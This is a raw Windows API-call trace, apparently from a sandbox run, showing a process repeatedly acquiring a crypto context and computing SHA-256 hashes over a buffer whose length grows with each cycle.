	[0226.167] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.167] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0226.167] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.167] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bf00, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bf00, pdwDataLen=0x1284a8) returned 1
	[0226.167] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.167] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.167] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.168] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.168] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0226.168] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.168] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bf28, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bf28, pdwDataLen=0x1284a8) returned 1
	[0226.168] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.168] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.168] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.168] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.168] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0226.168] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.168] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bf50, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bf50, pdwDataLen=0x1284a8) returned 1
	[0226.168] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.168] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.168] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.169] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.169] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0226.169] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.169] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bf78, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bf78, pdwDataLen=0x1284a8) returned 1
	[0226.169] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.169] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.169] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.169] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.169] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0226.169] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.169] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bfa0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bfa0, pdwDataLen=0x1284a8) returned 1
	[0226.170] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.170] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.170] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.170] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.170] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0226.170] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.170] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bfc8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bfc8, pdwDataLen=0x1284a8) returned 1
	[0226.170] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.170] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.170] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.170] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.171] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0226.171] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.171] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bff0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bff0, pdwDataLen=0x1284a8) returned 1
	[0226.171] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.171] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.171] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.171] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.171] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0226.171] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.171] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c018, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c018, pdwDataLen=0x1284a8) returned 1
	[0226.171] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.171] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.171] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.172] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.172] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0226.172] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.172] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c040, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c040, pdwDataLen=0x1284a8) returned 1
	[0226.172] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.172] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.172] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.172] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.172] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0226.172] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.172] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c068, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c068, pdwDataLen=0x1284a8) returned 1
	[0226.172] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.172] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.172] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.173] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.173] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0226.173] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.173] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c090, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c090, pdwDataLen=0x1284a8) returned 1
	[0226.173] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.173] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.173] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.174] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.174] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0226.174] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.174] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c0b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c0b8, pdwDataLen=0x1284a8) returned 1
	[0226.174] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.174] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.174] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.174] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.174] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0226.174] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.174] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c0e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c0e0, pdwDataLen=0x1284a8) returned 1
	[0226.174] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.175] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.175] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.175] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.175] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0226.175] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.175] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c108, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c108, pdwDataLen=0x1284a8) returned 1
	[0226.175] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.175] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.175] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.176] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.176] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0226.176] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.176] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c130, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c130, pdwDataLen=0x1284a8) returned 1
	[0226.176] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.176] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.176] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.176] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.176] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0226.177] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.177] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c158, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c158, pdwDataLen=0x1284a8) returned 1
	[0226.177] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.177] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.177] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.177] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.177] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0226.177] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.177] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c180, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c180, pdwDataLen=0x1284a8) returned 1
	[0226.177] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.177] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.177] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.178] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.178] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0226.178] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.178] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c1a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c1a8, pdwDataLen=0x1284a8) returned 1
	[0226.178] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.178] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.178] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.178] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.178] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0226.178] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.178] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c1d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c1d0, pdwDataLen=0x1284a8) returned 1
	[0226.178] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.178] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.178] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.179] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.179] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0226.179] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.179] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c1f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c1f8, pdwDataLen=0x1284a8) returned 1
	[0226.179] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.179] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.179] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.179] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.179] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0226.179] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.179] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c220, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c220, pdwDataLen=0x1284a8) returned 1
	[0226.179] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.179] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.179] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.180] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.180] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0226.180] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.180] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c248, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c248, pdwDataLen=0x1284a8) returned 1
	[0226.180] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.180] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.180] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.181] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.181] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0226.181] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.181] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c270, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c270, pdwDataLen=0x1284a8) returned 1
	[0226.181] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.181] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.181] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.181] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.181] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0226.182] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.182] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c298, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c298, pdwDataLen=0x1284a8) returned 1
	[0226.182] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.182] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.182] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.182] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.182] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0226.182] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.182] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c2c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c2c0, pdwDataLen=0x1284a8) returned 1
	[0226.182] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.182] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.182] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.183] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.183] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0226.183] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.183] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c2e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c2e8, pdwDataLen=0x1284a8) returned 1
	[0226.183] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.183] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.183] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.183] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.183] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0226.183] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.183] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c310, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c310, pdwDataLen=0x1284a8) returned 1
	[0226.183] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.183] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.183] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.184] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.184] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0226.184] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
